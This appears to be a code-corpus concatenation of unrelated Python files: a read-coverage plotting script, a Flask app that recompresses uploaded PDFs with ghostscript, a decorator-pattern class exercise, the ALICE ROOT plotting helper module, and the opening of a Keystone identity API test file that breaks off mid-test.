if args.y_min_max:
  ax.set_ylim(ymin=Ymin, ymax=Ymax)
for i in range(1, matrix.shape[1]):
  if SomeDataIsPaired:
    # Columns alternate read / insert counts per bam. Bug fix: use integer
    # division; under Python 3, (i - 1) / 2 is a float and cannot index
    # the aliases list ('//' behaves identically under Python 2).
    alias = aliases[(i - 1) // 2]
    if i % 2 == 0:
      label = 'read pairs, ' + alias
      linestyle = '--'
    else:
      label = 'reads, ' + alias
      linestyle = '-'
  else:
    label = aliases[i - 1]
    linestyle = '-'
  plt.plot(matrix[:, 0], matrix[:, i], label=label, linestyle=linestyle)
plt.xlabel('window width', fontsize=args.axis_font_size)
YaxisLabel = 'number of reads'
if args.normalise:
  YaxisLabel += ' relative to\nwhen the window width of zero'
if SomeDataIsPaired:
  title = \
      'Estimating the number of unpaired reads and paired reads (merging\n' + \
      'read in a pair when they overlap) spanning each window, assuming\n' + \
      'reads are randomly distributed over the whole genome'
else:
  title = \
      'Estimating the number of reads spanning each window, assuming\n' + \
      'they are randomly distributed over the whole genome'
plt.ylabel(YaxisLabel, fontsize=args.axis_font_size)
plt.title(title, fontsize=args.title_font_size)
ax.tick_params(axis='both', which='major', labelsize=args.axis_font_size)
if not args.linear_y_axis:
  ax.set_yscale('log')
ax.set_xlim(xmin=0, xmax=LastDesiredRow)
plt.legend(loc=args.legend_location, fontsize=args.legend_font_size)
plt.tight_layout()
plt.savefig(args.out_filename + '.pdf')
FreeCX/shakalator | main.py | 1 | 3902 | from flask import Flask, render_template, redirect, url_for
from flask import request, jsonify, send_file
from multiprocessing import Process, Pipe
from werkzeug import secure_filename
from os import path, system, remove
from hashlib import md5
import time
# 5m: generated files older than this (in seconds) are deleted.
TIME_DELTA = 5 * 60

# Create the Flask app; static files are served from the URL root.
""" инициализируем flask """
app = Flask(__name__, static_url_path='')

# Uploads go into an 'upload' directory next to this script.
""" настраиваем папку для загрузки файлов """
app.config['UPLOAD_FOLDER'] = path.join(path.dirname(path.realpath(__file__)), 'upload')
def get_hash(text):
    """Hex MD5 digest of the UTF-8 encoding of text (used as a job id)."""
    digest = md5(text.encode('utf-8'))
    return digest.hexdigest()
# Main worker process: receives (filename, hash_code, dpi) jobs over the
# pipe, runs ghostscript on each in a child process, and deletes generated
# files once they are older than TIME_DELTA.
def handler(conn):
    clean_list = []
    while True:
        # Wait up to 10s for a new job, then run a cleanup pass either way.
        if conn.poll(10):
            data = conn.recv()
            sh_thread = Process(target=gs_shakalizing, args=data)
            sh_thread.start()
            sh_thread.join()
            # data[1] is the hash code, which is also the output file name.
            clean_list.append((data[1], time.clock_gettime(0)))
        curr_time = time.clock_gettime(0)
        new_list = []
        for (filename, l_time) in clean_list:
            delta = curr_time - l_time
            if delta > TIME_DELTA:
                gen_file = path.join(app.config['UPLOAD_FOLDER'], filename)
                remove(gen_file)
            else:
                new_list.append((filename, l_time))
        clean_list = new_list
# Process the uploaded file: recompress it with ghostscript.
def gs_shakalizing(filename, new_name, dpi):
    """Runs ghostscript on upload/<filename>, writing upload/<new_name>,
    then deletes the original upload.

    Security fix: the original built a shell command string containing
    dpi, which arrives straight from the HTTP form (see shakalazing()),
    allowing shell command injection. Build an argument list and run
    without a shell instead.
    """
    import subprocess
    old_file = path.join(app.config['UPLOAD_FOLDER'], filename)
    new_file = path.join(app.config['UPLOAD_FOLDER'], new_name)
    subprocess.call([
        '/usr/bin/gs', '-sDEVICE=pdfwrite', '-dCompatibilityLevel=1.5',
        '-dPDFSETTINGS=/ebook', '-dNOPAUSE', '-dQUIET', '-dBATCH',
        '-dColorImageResolution={0}'.format(dpi),
        '-sOutputFile={0}'.format(new_file),
        old_file])
    remove(old_file)
# Check processing status (POST) or download the finished file (GET).
@app.route('/process', methods=['POST', 'GET'])
def process():
    """POST with JSON {'code': ...}: reports whether the generated file
    exists yet. GET with ?code=...: serves the generated PDF as a
    download; responds 404 when no code is given."""
    if request.method == 'POST':
        if request.json:
            filename = request.json.get('code')
            file_path = path.join(app.config['UPLOAD_FOLDER'], filename)
            if path.isfile(file_path):
                return jsonify({"status": "founded"})
            else:
                return jsonify({"status": "not found"})
        else:
            return jsonify({"status": "error"})
    else:
        filename = request.values.get('code')
        if filename:
            file_path = path.join(app.config['UPLOAD_FOLDER'], filename)
            return send_file(file_path, mimetype='application/pdf',
                as_attachment=True, attachment_filename=filename + '.pdf')
        else:
            # Bug fix: a Flask view may not return a bare int ('return 404'
            # raises a TypeError); return a body plus status code instead.
            return 'Not found', 404
# File upload (POST) and the waiting page (GET).
@app.route('/shakalazing', methods=['POST', 'GET'])
def shakalazing():
    """POST: saves the uploaded file, queues (filename, hash, dpi) on the
    worker pipe and redirects to the waiting page keyed by the hash.
    GET: renders the waiting page for the given code."""
    if request.method == 'POST':
        file = request.files['file']
        if file:
            filename = secure_filename(file.filename)
            file.save(path.join(app.config['UPLOAD_FOLDER'], filename))
            dpi = request.form.get('dpi')
            # NOTE(review): name + HH:MM:SS can collide for same-named
            # uploads within the same second.
            hash_code = get_hash(filename + time.strftime('%H:%M:%S'))
            parent_conn.send((filename, hash_code, dpi))
            return redirect(url_for('shakalazing', code=hash_code))
        else:
            return redirect(url_for('index'))
    else:
        return render_template('shakalazing.html', code=request.values.get('code'))
# Landing page.
@app.route('/')
def index():
    """Renders the main page template."""
    return render_template('index.html')
if __name__ == '__main__':
    # One background worker process runs ghostscript jobs and file cleanup;
    # the web process talks to it through this pipe.
    parent_conn, child_conn = Pipe()
    main_proc = Process(target=handler, args=(child_conn,))
    main_proc.start()
    app.run(host='0.0.0.0', port='5000')
    main_proc.join()
AnhellO/DAS_Sistemas | Ene-Jun-2020/garcia-morales-luis-fernando/1er Parcial/Primer Parcial/Ejercicio2.py | 1 | 1329 | import abc
from Ejercicio1 import Page
class PageComponent(metaclass=abc.ABCMeta):
    """Component interface of the decorator pattern: every (possibly
    decorated) page element renders itself via ContenidoPagina()."""

    @abc.abstractmethod
    def ContenidoPagina(self):
        # Bug fix: the abstract method lacked the 'self' parameter, so its
        # signature did not match any concrete implementation in this file.
        pass
class TagOpen(PageComponent):
    """Innermost component: renders the bare opening paragraph tag."""

    def ContenidoPagina(self):
        opening_tag = '<p'
        return opening_tag
class Estilo(PageComponent):
    """Decorator: appends an inline blue-colour style attribute and the
    '>' that closes the opening tag of the wrapped component."""

    def __init__(self, style: PageComponent):
        # The component being decorated.
        self.style = style

    def ContenidoPagina(self):
        return f'{self.style.ContenidoPagina()} style = "color:blue;">'
class TagClose(PageComponent):
    """Decorator: appends the closing </p> tag to whatever the wrapped
    component renders."""

    def __init__(self, style: PageComponent):
        # The component being decorated.
        self.style = style

    def ContenidoPagina(self):
        return f"{self.style.ContenidoPagina()} </p>"
class InsertarContenido(PageComponent):
    """Component that renders its stored text inside a styled <p> element."""

    def __init__(self, contenido):
        # The text to place inside the paragraph element.
        self.contenidoPagina = contenido

    def ContenidoPagina(self):
        # Bug fixes: the original called Estilo.ContenidoPagina() on the
        # class (no instance -> TypeError), and interpolated the bound
        # method self.ContenidoPagina instead of the stored attribute
        # self.contenidoPagina.
        opening = Estilo(TagOpen()).ContenidoPagina()
        return f"{opening}{self.contenidoPagina}</p>"
class main():
    # NOTE(review): using a class body as a script is unusual; these
    # statements run once, at class-definition (import) time. Kept as-is
    # to preserve the module's behaviour.
    pagina1 = Page(
        url="mail.google.com",
        path="mail.google.com/mail/u/0/#inbox",
        contenido="Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas.",
        titulo="<h1>Gmail</h1>",
        title="<title>Recibidos</title>",
        metadesc="Correo Electrnico",
        formato="html")
    tagOpen = TagOpen()
    estilo = Estilo(tagOpen)
    # Bug fix: the original printed the InsertarContenido object itself
    # (its repr); render it by calling ContenidoPagina().
    print(InsertarContenido(pagina1.get_contenido()).ContenidoPagina())
| mit |
aaniin/AliPhysics | PWGJE/EMCALJetTasks/Tracks/analysis/base/Graphics.py | 41 | 22080 | #**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
"""
Graphics module, containing basic ROOT plot helper functionality and
base classes for specific kinds of plots
@author: Markus Fasel ,
@contact: <markus.fasel@cern.ch>
@organization: Lawrence Berkeley National Laboratory
@organization: ALICE Collaboration
@copyright: 1998-2014, ALICE Experiment at CERN, All rights reserved
"""
from ROOT import TCanvas,TH1F,TLegend,TPad,TPaveText,TF1, TGraph, TH1
from ROOT import kBlack
class Frame:
    """
    Helper class handling frame drawing in plots
    """

    def __init__(self, name, xmin, xmax, ymin, ymax):
        """
        Construct frame with name and ranges for x and y coordinate
        @param name: Name of the frame
        @param xmin: Min. value of the x-coordinate
        @param xmax: Max. value of the x-coordinate
        @param ymin: Min. value of the y-coordinate
        @param ymax: Max. value of the y-coordinate
        """
        # The frame is an invisible histogram used only to supply the axes.
        self.__framehist = TH1F(name, "", 100, xmin, xmax)
        self.__framehist.SetStats(False)
        self.__framehist.GetYaxis().SetRangeUser(ymin, ymax)

    def SetXtitle(self, title):
        """
        Set title of the x axis
        @param title: Title of the x-axis
        """
        self.__framehist.GetXaxis().SetTitle(title)

    def SetYtitle(self, title):
        """
        Set title of the y axis
        @param title: Title of the y-axis
        """
        self.__framehist.GetYaxis().SetTitle(title)

    def Draw(self):
        """
        Draw the frame.
        """
        # "axis" draw option: only the axes are drawn, no contents.
        self.__framehist.Draw("axis")
class Style:
    """
    Class for plot styles (currently only color and marker)
    """

    def __init__(self, color, marker, options = None):
        """
        Constructor
        @param color: Color definition of the style
        @param marker: Marker definition of the style
        @param options: Optional other style definitions (dict; recognised
        keys: fillstyle, fillcolor, linestyle, linewidth)
        """
        self.__color = color
        self.__marker = marker
        self.__linestyle = None
        self.__linewidth = None
        self.__fillstyle = None
        self.__fillcolor = None
        if options:
            if "fillstyle" in options.keys():
                self.__fillstyle = options["fillstyle"]
            if "fillcolor" in options.keys():
                self.__fillcolor = options["fillcolor"]
            if "linestyle" in options.keys():
                self.__linestyle = options["linestyle"]
            if "linewidth" in options.keys():
                self.__linewidth = options["linewidth"]

    def SetColor(self, color):
        """
        Change color of the graphics object
        @param color: The color of the object
        """
        self.__color = color

    def SetMarker(self, marker):
        """
        Change marker style of the graphics object
        @param marker: The marker style
        """
        self.__marker = marker

    def SetLineStyle(self, linestyle):
        """
        Change the line style
        @param linestyle: New line style
        """
        self.__linestyle = linestyle

    def SetLineWidth(self, linewidth):
        """
        Change the line width
        @param linewidth: New line width
        """
        self.__linewidth = linewidth

    def SetFillStyle(self, fillstyle):
        """
        Change the fill style
        @param fillstyle: New fill style
        """
        self.__fillstyle = fillstyle

    def SetFillColor(self, fillcolor):
        """
        Change the fill color
        @param fillcolor: the new fill color
        """
        self.__fillcolor = fillcolor

    def GetColor(self):
        """
        Access color of the graphics object
        @return: Marker color
        """
        return self.__color

    def GetMarker(self):
        """
        Access marker style
        @return: Marker style
        """
        return self.__marker

    def GetLineStyle(self):
        """
        Get the line style (if defined)
        @return: The line style
        """
        return self.__linestyle

    def GetLineWidth(self):
        """
        Get the line width
        @return: The line width
        """
        return self.__linewidth

    def GetFillStyle(self):
        """
        Get the fill style (if defined)
        @return: The fill style
        """
        return self.__fillstyle

    def GetFillColor(self):
        """
        Get the fill color (if defined)
        @return: The fill color
        """
        return self.__fillcolor

    def DefineROOTPlotObject(self, rootobject):
        """
        Sets the style to the root object
        @param rootobject: The ROOT graphics object to be defined
        """
        #print "Defining root object"
        rootobject.SetMarkerColor(self.__color)
        if self.__linestyle is not None:
            rootobject.SetLineStyle(self.__linestyle)
        if self.__linewidth is not None:
            rootobject.SetLineWidth(self.__linewidth)
        if not type(rootobject) is TF1:
            # TF1 carries no marker; only histograms/graphs get these.
            rootobject.SetMarkerStyle(self.__marker)
            rootobject.SetLineColor(self.__color)
        if self.__fillstyle is not None:
            rootobject.SetFillStyle(self.__fillstyle)
        if self.__fillcolor is not None:
            rootobject.SetFillColor(self.__fillcolor)
class GraphicsObject:
    """
    Container for styled objects, inheriting from TGraph, TH1 or TF1
    """

    def __init__(self, data, style = None, drawoption = "epsame"):
        """
        Initialise new graphics object with underlying data (can be TH1 or TGraph(Errors)),
        and optionally a plot style. If no plot style is provided, then the default style (black,
        filled circles) is chosen.
        @param data: Underlying data as root object
        @param style: Plot style applied
        @param drawoption: Draw option
        """
        self.__data = data
        mystyle = Style(kBlack, 20)
        if style:
            mystyle = style
        self.SetStyle(mystyle)
        self.__drawoption = "epsame"
        if drawoption:
            self.__drawoption = drawoption
        # Guarantee that the option always draws on top of the current pad.
        if not "same" in self.__drawoption:
            self.__drawoption += "same"
        if type(self.__data) is TF1:
            # Functions are always drawn as a line.
            self.__drawoption = "lsame"

    def SetStyle(self, style):
        """
        Initialise underlying object with style
        @param style: The plot style used
        """
        style.DefineROOTPlotObject(self.__data)

    def GetData(self):
        """
        Provide access to underlying data
        @return: The underlying root object
        """
        return self.__data

    def Draw(self):
        """
        Draw graphics object. By default, the plot option is
        "epsame". Option strings will always have the option same
        """
        #print "Drawing option %s" %(self.__drawoption)
        self.__data.Draw(self.__drawoption)

    def AddToLegend(self, legend, title):
        """
        Add graphics object to a legend provided from outside
        @param legend: The legend the object is added to
        @param title: Legend entry title
        """
        option = "lep"
        if type(self.__data) is TF1:
            option = "l"
        elif self.__IsBoxStyle(self.__data):
            option = "f"
        legend.AddEntry(self.__data, title, option)

    def __IsBoxStyle(self, plotobject):
        """
        Check whether plot object is drawn in a box style
        @param plotobject: The object to check. NOTE(review): the method
        actually inspects self.__data, not this parameter.
        @return: True if in box style, False otherwise
        """
        if type(self.__data) is TF1:
            return False
        elif issubclass(type(self.__data), TGraph):
            # Graph fill draw options contain one of the digits 2-5.
            for i in range(2, 6):
                if "%d" %(i) in self.__drawoption.lower():
                    return True
            return False
        elif issubclass(type(self.__data), TH1):
            return True if "b" in self.__drawoption.lower() else False
class PlotBase:
    """
    Base class for plot objects.
    """

    class _FramedPad:
        """
        Defining the pad structure inside the canvas. A pad has a frame with
        axes definition, and optionally a legend and one or several label(s).
        """

        class GraphicsEntry:
            """
            Definition of a graphics entry: the drawable object plus its
            legend title and a flag steering whether it enters the legend.
            """

            def __init__(self, graphobject, title=None, addToLegend=False):
                """
                Constructor.
                @param graphobject: Underlying graphics object
                @param title: Legend entry title (optional)
                @param addToLegend: Whether the object enters the legend
                """
                self.__object = graphobject
                self.__title = title
                self.__addToLegend = addToLegend

            def __cmp__(self, other):
                """
                Comparison is done according to the object title.
                @param other: object to compare with
                @return: 0 if objects are equal, 1 if this object is larger,
                         -1 if this object is smaller
                """
                # 1st case: either or both of the titles missing.
                # Bug fix: the original returned None when both titles were
                # missing, which is not a valid __cmp__ result and breaks
                # sorting; treat two untitled entries as equal instead.
                if not self.__title and not other.GetTitle():
                    return 0
                if not self.__title and other.GetTitle():
                    return -1
                if self.__title and not other.GetTitle():
                    return 1
                # second case: both of the titles available
                if self.__title == other.GetTitle():
                    return 0
                if self.__title < other.GetTitle():
                    return -1
                return 1

            # Rich comparison operators so that sorting (see CreateLegend)
            # also works on Python 3, where __cmp__ is ignored.
            def __eq__(self, other):
                return self.__cmp__(other) == 0

            def __ne__(self, other):
                return self.__cmp__(other) != 0

            def __lt__(self, other):
                return self.__cmp__(other) < 0

            def __le__(self, other):
                return self.__cmp__(other) <= 0

            def __gt__(self, other):
                return self.__cmp__(other) > 0

            def __ge__(self, other):
                return self.__cmp__(other) >= 0

            def GetObject(self):
                """
                Accessor to graphics object
                @return: Underlying object
                """
                return self.__object

            def GetTitle(self):
                """
                Get the title of the object
                @return: Title of the object
                """
                return self.__title

            def IsAddToLegend(self):
                """
                Check whether graphics is foreseen to be added to legend
                @return: True if the object is added to the legend
                """
                return self.__addToLegend

            def SetTitle(self, title):
                """
                Change title of the graphics object
                @param title: Title of the object
                """
                self.__title = title

            def SetAddToLegend(self, doAdd):
                """
                Define whether object should be added to a legend
                @param doAdd: Switch for adding object to a legend
                """
                self.__addToLegend = doAdd

        def __init__(self, pad):
            """
            Constructor, creating a framed pad structure for a TPad
            @param pad: Underlying ROOT pad
            """
            self.__pad = pad
            # Bug fix: this attribute was initialised as self.__Frame but
            # read/written as self.__frame in DrawFrame.
            self.__frame = None
            self.__legend = None
            self.__graphicsObjects = []
            self.__labels = []

        def DrawFrame(self, frame):
            """
            Draw a frame, defined from outside, within the pad.
            The pad becomes owner of the frame.
            @param frame: Frame of the pad
            """
            self.__frame = frame
            self.__frame.Draw()

        def DrawGraphicsObject(self, graphics, addToLegend=False, title=None):
            """
            Draw a graphics object into the pad. If addToLegend is set, then
            the object is added to the legend.
            @param graphics: Graphics object to draw
            @param addToLegend: Whether the object enters the legend
            @param title: Legend entry title
            """
            self.__graphicsObjects.append(
                self.GraphicsEntry(graphics, title, addToLegend))
            graphics.Draw()

        def DefineLegend(self, xmin, ymin, xmax, ymax):
            """
            Create a new legend within the frame with the given boundary
            coordinates (no-op if a legend has already been defined).
            @param xmin: Min. x value of the legend
            @param ymin: Min. y value of the legend
            @param xmax: Max. x value of the legend
            @param ymax: Max. y value of the legend
            """
            if not self.__legend:
                self.__legend = TLegend(xmin, ymin, xmax, ymax)
                self.__legend.SetBorderSize(0)
                self.__legend.SetFillStyle(0)
                self.__legend.SetTextFont(42)

        def CreateLegend(self, xmin, ymin, xmax, ymax):
            """
            Create legend from all graphics entries and draw it.
            @param xmin: Min. x value of the legend
            @param ymin: Min. y value of the legend
            @param xmax: Max. x value of the legend
            @param ymax: Max. y value of the legend
            """
            if not self.__legend:
                self.DefineLegend(xmin, ymin, xmax, ymax)
            # Entries are sorted by title (see GraphicsEntry comparison)
            for entry in sorted(self.__graphicsObjects):
                if entry.IsAddToLegend():
                    self.AddToLegend(entry.GetObject(), entry.GetTitle())
            self.DrawLegend()

        def GetLegend(self):
            """
            Provide access to legend
            @return: the legend
            """
            return self.__legend

        def AddToLegend(self, graphicsObject, title):
            """
            Special method adding graphics objects to a legend
            @param graphicsObject: graphics object to be added to the legend
            @param title: Legend entry title
            """
            if self.__legend:
                graphicsObject.AddToLegend(self.__legend, title)

        def DrawLegend(self):
            """
            Draw the legend (if defined).
            """
            if self.__legend:
                self.__legend.Draw()

        def DrawLabel(self, xmin, ymin, xmax, ymax, text):
            """
            Add a new label to the pad and draw it.
            @param xmin: Min. x value of the label
            @param ymin: Min. y value of the label
            @param xmax: Max. x value of the label
            @param ymax: Max. y value of the label
            @param text: Label text
            """
            label = TPaveText(xmin, ymin, xmax, ymax, "NDC")
            label.SetBorderSize(0)
            label.SetFillStyle(0)
            label.SetTextFont(42)
            label.AddText(text)
            label.Draw()
            # Keep a reference so the label is not garbage-collected
            self.__labels.append(label)

        def GetPad(self):
            """
            Provide direct access to the pad
            @return: Underlying ROOT pad
            """
            return self.__pad

    class _FrameContainer:
        """
        Container for framed pad objects
        """

        def __init__(self):
            """
            Create new empty frame container
            """
            self.__Frames = {}

        def AddFrame(self, frameID, frame):
            """
            Add a new framed pad to the frame container
            @param frameID: ID of the frame
            @param frame: Frame to be added for pad with ID
            """
            self.__Frames[frameID] = frame

        def GetFrame(self, frameID):
            """
            Provide access to frame
            @param frameID: ID of the frame
            @return: The frame for the pad, or None if it does not exist
            """
            # "in" instead of the Python-2-only dict.has_key
            if frameID not in self.__Frames:
                return None
            return self.__Frames[frameID]

    def __init__(self):
        """
        Initialise new plot
        """
        self._canvas = None
        self._frames = self._FrameContainer()

    def _OpenCanvas(self, canvasname, canvastitle, xsize=1000, ysize=800):
        """
        Initialise canvas with name, title and sizes
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        @param xsize: Canvas size in x-direction
        @param ysize: Canvas size in y-direction
        """
        self._canvas = TCanvas(canvasname, canvastitle, xsize, ysize)
        self._canvas.cd()

    def SaveAs(self, filenamebase):
        """
        Save plot to files:
        Creating a file with a common name in the formats
        eps, pdf, jpeg, gif and png
        @param filenamebase: Basic part of the filename (without endings)
        """
        for t in ["eps", "pdf", "jpeg", "gif", "png"]:
            self._canvas.SaveAs("%s.%s" % (filenamebase, t))
class SinglePanelPlot(PlotBase):
    """
    Plot consisting of a single framed pad covering the whole canvas
    (stored in the frame container under ID 0).
    """

    def __init__(self):
        """
        Initialise single panel plot
        """
        PlotBase.__init__(self)

    def _OpenCanvas(self, canvasname, canvastitle):
        """
        Create canvas and add it to the list of framed pads
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        """
        PlotBase._OpenCanvas(self, canvasname, canvastitle, 1000, 800)
        # The canvas itself acts as the (only) pad, registered with ID 0
        self._frames.AddFrame(0, self._FramedPad(self._canvas))

    def _GetFramedPad(self):
        """
        Access to framed pad
        @return: The underlying framed pad
        """
        return self._frames.GetFrame(0)
class MultipanelPlot(PlotBase):
    """
    Base Class For multiple panel plots
    """

    def __init__(self, nrow, ncol):
        """
        Create new Multi-panel plot with a given number of rows and cols
        @param nrow: Number of rows
        @param ncol: Number of columns
        """
        PlotBase.__init__(self)
        self.__nrow = nrow
        self.__ncol = ncol

    def _OpenCanvas(self, canvasname, canvastitle, xsize, ysize):
        """
        Create new canvas and split it into the amount of pads as defined
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        @param xsize: Canvas size in x-direction
        @param ysize: Canvas size in y-direction
        """
        PlotBase._OpenCanvas(self, canvasname, canvastitle, xsize, ysize)
        self._canvas.Divide(self.__ncol, self.__nrow)

    def _OpenPad(self, padID):
        """
        Create new framed pad in a multi-panel plot for a given pad ID,
        or return the already-existing pad for that ID.
        @param padID: ID number of the pad
        @return: The framed pad, or None for an out-of-range ID
        """
        if padID < 0 or padID > self.__GetMaxPadID():
            return None
        mypad = self._GetPad(padID)
        if not mypad:
            # NOTE(review): __GetPadID already produces 1-based IDs
            # (1 + row * ncol + col), yet cd() is called with padID+1 —
            # this looks like a double offset that skips sub-pad 1.
            # Confirm the intended ID convention before changing.
            mypad = self._FramedPad(self._canvas.cd(padID+1))
            self._frames.AddFrame(padID, mypad)
        return mypad

    def _OpenPadByRowCol(self, row, col):
        """
        Create new framed pad in a multi-panel plot for a given row and col
        @param row: row of the pad
        @param col: column of the pad
        @return: The new pad at this position
        """
        return self._OpenPad(self.__GetPadID(row, col))

    def _GetPad(self, padID):
        """
        Access to Pads by pad ID
        @param padID: ID number of the pad
        @return: The framed pad, or None if not opened yet
        """
        return self._frames.GetFrame(padID)

    def _GetPadByRowCol(self, row, col):
        """
        Access Pad by row and col
        @param row: row of the pad
        @param col: column of the pad
        @return: The pad at this position
        """
        return self._frames.GetFrame(self.__GetPadID(row, col))

    def __GetPadID(self, row, col):
        """
        Calculate ID of the pad (1-based, row-major), or -1 when the
        row/col combination is out of range.
        @param row: row of the pad
        @param col: column of the pad
        @return: The pad ID for this combination
        """
        if (row < 0 or row >= self.__nrow) or (col < 0 or col >= self.__ncol):
            return -1
        return 1 + row * self.__ncol + col

    def __GetMaxPadID(self):
        """
        Calculate the maximum allowed pad ID.
        NOTE(review): this is 1 + nrow * ncol, one larger than the biggest
        ID __GetPadID can produce (nrow * ncol); the bound check in
        _OpenPad is therefore one too permissive — confirm intent.
        @return: The maximum pad ID
        """
        return 1 + self.__ncol * self.__nrow
class TwoPanelPlot(MultipanelPlot):
    """
    A plot with two (1x2) panels
    """

    def __init__(self):
        """
        Initialise two-panel plot
        """
        MultipanelPlot.__init__(self, 1, 2)

    def _OpenCanvas(self, canvasname, canvastitle, xsize=1000, ysize=500):
        """
        Create Canvas with the dimensions of a two-panel plot.
        Named _OpenCanvas for consistency with SinglePanelPlot and
        FourPanelPlot; the size parameters default to the two-panel
        dimensions but remain overridable for callers of the base-class
        four-argument signature.
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        @param xsize: Canvas size in x-direction
        @param ysize: Canvas size in y-direction
        """
        MultipanelPlot._OpenCanvas(self, canvasname, canvastitle, xsize, ysize)

    def _CreateCanvas(self, canvasname, canvastitle):
        """
        Backwards-compatible alias: this method was originally (and
        inconsistently with the sibling classes) named _CreateCanvas.
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        """
        self._OpenCanvas(canvasname, canvastitle)
class FourPanelPlot(MultipanelPlot):
    """
    A plot with four (2x2) panels
    """

    def __init__(self):
        """
        Initialise four-panel plot
        """
        MultipanelPlot.__init__(self, 2, 2)

    def _OpenCanvas(self, canvasname, canvastitle):
        """
        Create Canvas with the dimensions of a four-panel plot
        @param canvasname: Name of the canvas
        @param canvastitle: Title of the canvas
        """
        MultipanelPlot._OpenCanvas(self, canvasname, canvastitle, 1000, 1000)
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo_config import cfg
from testtools import matchers
from keystone.common import controller
from keystone import exception
from keystone.tests import unit as tests
from keystone.tests.unit import test_v3
CONF = cfg.CONF
class IdentityTestCase(test_v3.RestfulTestCase):
    """Test users and groups."""

    def setUp(self):
        super(IdentityTestCase, self).setUp()
        # A group in the test domain, used by the group-membership tests
        self.group = self.new_group_ref(
            domain_id=self.domain_id)
        self.group = self.identity_api.create_group(self.group)
        self.group_id = self.group['id']
        # A credential owned by the default test user; test_delete_user
        # checks that it is cascade-deleted together with the user
        self.credential_id = uuid.uuid4().hex
        self.credential = self.new_credential_ref(
            user_id=self.user['id'],
            project_id=self.project_id)
        self.credential['id'] = self.credential_id
        self.credential_api.create_credential(
            self.credential_id,
            self.credential)

    # user crud tests

    def test_create_user(self):
        """Call ``POST /users``."""
        ref = self.new_user_ref(domain_id=self.domain_id)
        r = self.post(
            '/users',
            body={'user': ref})
        return self.assertValidUserResponse(r, ref)

    def test_create_user_without_domain(self):
        """Call ``POST /users`` without specifying domain.

        According to the identity-api specification, if you do not
        explicitly specify the domain_id in the entity, it should
        take the domain scope of the token as the domain_id.

        """
        # Create a user with a role on the domain so we can get a
        # domain scoped token
        domain = self.new_domain_ref()
        self.resource_api.create_domain(domain['id'], domain)
        user = self.new_user_ref(domain_id=domain['id'])
        password = user['password']
        user = self.identity_api.create_user(user)
        user['password'] = password
        self.assignment_api.create_grant(
            role_id=self.role_id, user_id=user['id'],
            domain_id=domain['id'])

        # Reference user without a domain_id ("nd" = no domain)
        ref = self.new_user_ref(domain_id=domain['id'])
        ref_nd = ref.copy()
        ref_nd.pop('domain_id')
        auth = self.build_authentication_request(
            user_id=user['id'],
            password=user['password'],
            domain_id=domain['id'])
        r = self.post('/users', body={'user': ref_nd}, auth=auth)
        self.assertValidUserResponse(r, ref)

        # Now try the same thing without a domain token - which should fail
        ref = self.new_user_ref(domain_id=domain['id'])
        ref_nd = ref.copy()
        ref_nd.pop('domain_id')
        auth = self.build_authentication_request(
            user_id=self.user['id'],
            password=self.user['password'],
            project_id=self.project['id'])
        r = self.post('/users', body={'user': ref_nd}, auth=auth)
        # TODO(henry-nash): Due to bug #1283539 we currently automatically
        # use the default domain_id if a domain scoped token is not being
        # used. Change the code below to expect a failure once this bug is
        # fixed.
        ref['domain_id'] = CONF.identity.default_domain_id
        return self.assertValidUserResponse(r, ref)

    def test_create_user_400(self):
        """Call ``POST /users`` with an empty user entity (bad request)."""
        self.post('/users', body={'user': {}}, expected_status=400)

    def test_list_users(self):
        """Call ``GET /users``."""
        resource_url = '/users'
        r = self.get(resource_url)
        self.assertValidUserListResponse(r, ref=self.user,
                                         resource_url=resource_url)

    def test_list_users_with_multiple_backends(self):
        """Call ``GET /users`` when multiple backends is enabled.

        In this scenario, the controller requires a domain to be specified
        either as a filter or by using a domain scoped token.

        """
        self.config_fixture.config(group='identity',
                                   domain_specific_drivers_enabled=True)

        # Create a user with a role on the domain so we can get a
        # domain scoped token
        domain = self.new_domain_ref()
        self.resource_api.create_domain(domain['id'], domain)
        user = self.new_user_ref(domain_id=domain['id'])
        password = user['password']
        user = self.identity_api.create_user(user)
        user['password'] = password
        self.assignment_api.create_grant(
            role_id=self.role_id, user_id=user['id'],
            domain_id=domain['id'])

        ref = self.new_user_ref(domain_id=domain['id'])
        ref_nd = ref.copy()
        ref_nd.pop('domain_id')
        auth = self.build_authentication_request(
            user_id=user['id'],
            password=user['password'],
            domain_id=domain['id'])

        # First try using a domain scoped token
        resource_url = '/users'
        r = self.get(resource_url, auth=auth)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)

        # Now try with an explicit filter
        resource_url = ('/users?domain_id=%(domain_id)s' %
                        {'domain_id': domain['id']})
        r = self.get(resource_url)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)

        # Now try the same thing without a domain token or filter,
        # which should fail
        r = self.get('/users', expected_status=exception.Unauthorized.code)

    def test_list_users_with_static_admin_token_and_multiple_backends(self):
        # domain-specific operations with the bootstrap ADMIN token is
        # disallowed when domain-specific drivers are enabled
        self.config_fixture.config(group='identity',
                                   domain_specific_drivers_enabled=True)
        self.get('/users', token=CONF.admin_token,
                 expected_status=exception.Unauthorized.code)

    def test_list_users_no_default_project(self):
        """Call ``GET /users`` making sure no default_project_id."""
        user = self.new_user_ref(self.domain_id)
